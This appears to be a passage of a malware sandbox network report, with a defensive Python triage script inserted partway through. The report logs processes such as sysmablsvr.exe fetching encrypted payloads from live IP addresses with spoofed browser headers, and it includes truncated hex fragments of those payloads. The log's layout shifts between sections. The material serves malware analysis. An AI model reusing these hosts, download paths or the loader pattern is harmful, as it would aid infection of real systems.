                                            Sep 17, 2024 23:10:01.236805916 CEST | 1236 | IN | Data Raw: 8c c8 46 fd 7c b3 b9 a1 94 a6 7b 4b c1 71 aa e7 a4 be 30 e5 5f 0e 05 16 bc 74 a8 2d 5c 2f 95 72 38 4e e1 76 31 86 be b0 b9 4d c9 83 64 b1 2d 19 3d 98 16 3b 2f 0b ec e9 18 da 39 a9 18 f7 a4 82 1f a4 33 02 ce 29 81 12 bd c3 f7 91 1b 26 27 d1 55 5c
                                            Data Ascii: F|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]ReebGCh+;`4TO{ZVj{726Vij&)q C*(*N|3q.C2&_JcQqGnwR
                                            Sep 17, 2024 23:10:01.236819029 CEST | 1236 | IN | Data Raw: 18 3e a6 e8 85 bc a6 54 db 4a 14 bc ac 5a 13 7e 50 e4 f7 f8 90 7e 8e c4 4e d6 4a 50 6c 97 a3 82 31 ec 59 be 4c 6f 38 62 b9 d7 4e 68 c4 e0 fb 81 94 96 eb 34 f8 ef 65 4d 72 0c e4 72 b0 61 ad 02 27 c5 b1 82 5c 94 03 fd 50 45 43 36 7b e0 0c a7 45 e4
                                            Data Ascii: >TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U74;B3Q&maoMkjyt'K1H(,TNK#/S|eQ2/f[C]A-Z&QQ>RuvF&0
                                            Sep 17, 2024 23:10:01.241662025 CEST | 449 | IN | Data Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
                                            Data Ascii: 'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW!^LczVym_ZAVcYoZx%$[_j2\u\wch~;[E5}uiIj^A
                                            Sep 17, 2024 23:10:07.443656921 CEST | 166 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:07.663274050 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:07 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
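
A triage helper for session logs in this form, added here as an example; it is not Joe Sandbox code and not part of the report. It reads the rows as the raw export flattens them (timestamp, byte count and direction run together ahead of the data column), pairs each outbound request with the response that follows it, and records the three things worth checking on this traffic: the requests spoof a Chrome User-Agent but send no Accept headers and address a bare IP in Host; the 200 responses are application/octet-stream bodies whose bytes are close to random; and the nginx ETags, which are built as hex last-modified time followed by hex size, agree with Content-Length and Last-Modified, so the same artifact can be recognised when another host serves it. The sample log is a constructed excerpt copied from the report with the hex bodies cut short, and the 6.5 bits/byte threshold is the example's own choice.

```python
import math
import re
from collections import Counter
from datetime import datetime, timezone
from ipaddress import ip_address

# Constructed excerpt: two exchanges copied from the report above, kept in the
# flattened "Timestamp / Bytes transferred / Direction / Data" row form of the
# raw export. Hex bodies are cut to their first bytes, as in the report.
LOG_EXCERPT = """\
Sep 17, 2024 23:09:32.192881107 CEST166OUTGET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
Sep 17, 2024 23:09:32.414632082 CEST728INHTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 564
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a [TRUNCATED]
Sep 17, 2024 23:09:58.798137903 CEST166OUTGET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:09:59.523145914 CEST1236INHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: application/octet-stream
Content-Length: 12544
Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
ETag: "66e9aea8-3100"
Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
Sep 17, 2024 23:09:59.528557062 CEST449INData Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
"""

# A flattened row: timestamp, byte count and IN/OUT run together, then the data.
ROW_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} [\d:.]+ [A-Z]{3,4})"
                    r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<data>.*)$")


def _hex_body(field: str) -> bytes:
    """'Data Raw: 3c 68 ... [TRUNCATED]' -> bytes, truncation marker dropped."""
    return bytes.fromhex(field.split(":", 1)[1].replace("[TRUNCATED]", ""))


def parse_log(text: str) -> list:
    """Rebuild HTTP messages: a timestamped row carrying a request or status line
    opens a message, header lines attach to it, and 'Data Raw:' rows (with or
    without their own timestamp) append body bytes to the current message."""
    msgs = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        data = m["data"] if m else line
        if data.startswith("Data Raw:") and msgs:
            msgs[-1]["body"] += _hex_body(data)
        elif m:
            msgs.append({"dir": m["dir"], "start": data, "headers": {}, "body": b""})
        elif msgs and ":" in line and not line.startswith("Data Ascii:"):
            name, value = line.split(":", 1)
            msgs[-1]["headers"][name.strip().lower()] = value.strip()
    return msgs


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: about 4 to 5 for HTML, close to 8 for encrypted or packed data."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def decode_nginx_etag(etag: str):
    """nginx's default ETag is '<hex last-modified epoch>-<hex size>'."""
    mtime_hex, size_hex = etag.strip().strip('"').split("-")
    return datetime.fromtimestamp(int(mtime_hex, 16), timezone.utc), int(size_hex, 16)


def looks_like_fake_browser(headers: dict) -> bool:
    """Chrome sends Accept, Accept-Language and Accept-Encoding on every fetch and
    rarely addresses a bare IP; the loader's requests carry only UA and Host."""
    try:
        ip_address(headers.get("host", "").split(":")[0])
    except ValueError:
        return False
    claims_browser = headers.get("user-agent", "").startswith("Mozilla/")
    return claims_browser and not any(
        h in headers for h in ("accept", "accept-language", "accept-encoding"))


def triage(text: str, high_entropy: float = 6.5) -> list:
    """Pair each OUT request with the next IN response and summarise the fetch.
    The entropy threshold is this example's choice: short body prefixes never
    reach a full 8 bits, so 6.5 already separates ciphertext from HTML."""
    findings, cur = [], None
    for msg in parse_log(text):
        if msg["dir"] == "OUT":
            cur = {"host": msg["headers"].get("host"), "uri": msg["start"].split()[1],
                   "fake_browser": looks_like_fake_browser(msg["headers"]),
                   "status": None, "entropy": 0.0, "etag_consistent": None, "payload": False}
            findings.append(cur)
        elif cur is not None and cur["status"] is None:
            h = msg["headers"]
            cur["status"] = int(msg["start"].split()[1])
            cur["entropy"] = round(shannon_entropy(msg["body"]), 2)
            if "etag" in h:
                _, size = decode_nginx_etag(h["etag"])
                cur["etag_consistent"] = size == int(h.get("content-length", "-1"))
            cur["payload"] = bool(cur["status"] == 200
                                  and h.get("content-type") == "application/octet-stream"
                                  and cur["entropy"] >= high_entropy)
    return findings


if __name__ == "__main__":
    for finding in triage(LOG_EXCERPT):
        print(finding)
```

Run against the full export, the helper turns the sessions above into a short list: the requests to 185.215.113.66 and 77.91.77.92 produced 404s or no answer at all, while 91.202.233.141 served /1 (ETag 66e9aea8-3100, 12544 bytes, modified 17 Sep 2024 16:30:32 UTC) and /2 (ETag 66e17142-1f00, 7936 bytes, modified 11 Sep 2024 10:30:26 UTC), both with high-entropy bodies. The ETag decode is a cheap consistency check rather than proof of anything; a server can set any ETag it likes, so treat a mismatch as a reason to look closer, not as a verdict.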


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            11 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:10:08.681487083 CEST | 166 | OUT | GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:10.219350100 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:09 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
Connection: keep-alive
ETag: "66e17142-1f00"
Accept-Ranges: bytes
Data Raw / Data Ascii: [binary response body, hex and ASCII dumps omitted]
Sep 17, 2024 23:10:10.219369888 CEST | 224 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219382048 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219510078 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219521046 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219531059 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219542027 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219670057 CEST | 552 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219680071 CEST | 552 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:10.219687939 CEST | 8 | IN | Data Raw: 21 9c 14 4f 88 47 9c c5
Sep 17, 2024 23:10:10.220110893 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:09 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
Connection: keep-alive
ETag: "66e17142-1f00"
Accept-Ranges: bytes
Data Raw / Data Ascii: [binary response body, hex and ASCII dumps omitted]
Sep 17, 2024 23:10:10.223161936 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:09 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
Connection: keep-alive
ETag: "66e17142-1f00"
Accept-Ranges: bytes
Data Raw / Data Ascii: [binary response body, hex and ASCII dumps omitted]
Sep 17, 2024 23:10:16.630811930 CEST | 166 | OUT | GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:10:16.846080065 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:16 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: [hex dump omitted; the decoded body follows as Data Ascii]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 17, 2024 23:10:19.690042019 CEST | 166 | OUT | GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:10:19.905354023 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:19 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: [hex dump omitted; the decoded body follows as Data Ascii]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49752 | 91.202.233.141 | 80 | 332 | C:\Users\user\AppData\Local\Temp\524024912.exe
Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:10:15.953558922 CEST | 175 | OUT | GET /PLTRESA HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:10:16.643790960 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:16 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: [hex dump omitted; the decoded body follows as Data Ascii]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:10:21.961731911 CEST | 166 | OUT | GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:10:22.670964956 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:22 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: [hex dump omitted; the decoded body follows as Data Ascii]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49756 | 91.202.233.141 | 80 | 6768 | C:\Windows\sysmablsvr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:10:24.724494934 CEST | 166 | OUT | GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:10:25.439697981 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:25 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: [hex dump omitted; the decoded body follows as Data Ascii]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:10:28.590056896 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
Sep 17, 2024 23:10:29.317533016 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:29 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
Connection: keep-alive
ETag: "66e9ef5f-1f00"
Accept-Ranges: bytes
Data Raw / Data Ascii: [binary response body, hex and ASCII dumps omitted]
Sep 17, 2024 23:10:29.317673922 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:29.317725897 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:29.317759037 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:29.317790985 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:29.317823887 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:29.317858934 CEST | 776 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49759 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:10:30.339901924 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
Sep 17, 2024 23:10:31.032341003 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:10:30 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
Connection: keep-alive
ETag: "66e9ef5f-1f00"
Accept-Ranges: bytes
Data Raw / Data Ascii: [binary response body, hex and ASCII dumps omitted]
Sep 17, 2024 23:10:31.032361031 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032377958 CEST | 448 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032392025 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032421112 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032448053 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032478094 CEST | 1236 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.032545090 CEST | 328 | IN | Data Raw / Data Ascii: [binary payload chunk, dumps omitted]
Sep 17, 2024 23:10:31.118762970 CEST | 8 | IN | Data Raw: 1b b5 08 3e b6 9b 0d ab


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            17          192.168.2.4  49761        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:33.389040947 CEST  274                OUT        GET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
                                            Sep 17, 2024 23:10:34.077852011 CEST  1236               IN         HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:33 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            18          192.168.2.4  49762        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:36.973849058 CEST  166                OUT        GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:37.671324968 CEST  728                IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:37 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            19          192.168.2.4  49764        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:39.759188890 CEST  166                OUT        GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:40.456398010 CEST  728                IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            20          192.168.2.4  49766        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:42.495062113 CEST  166                OUT        GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:43.194051027 CEST  728                IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
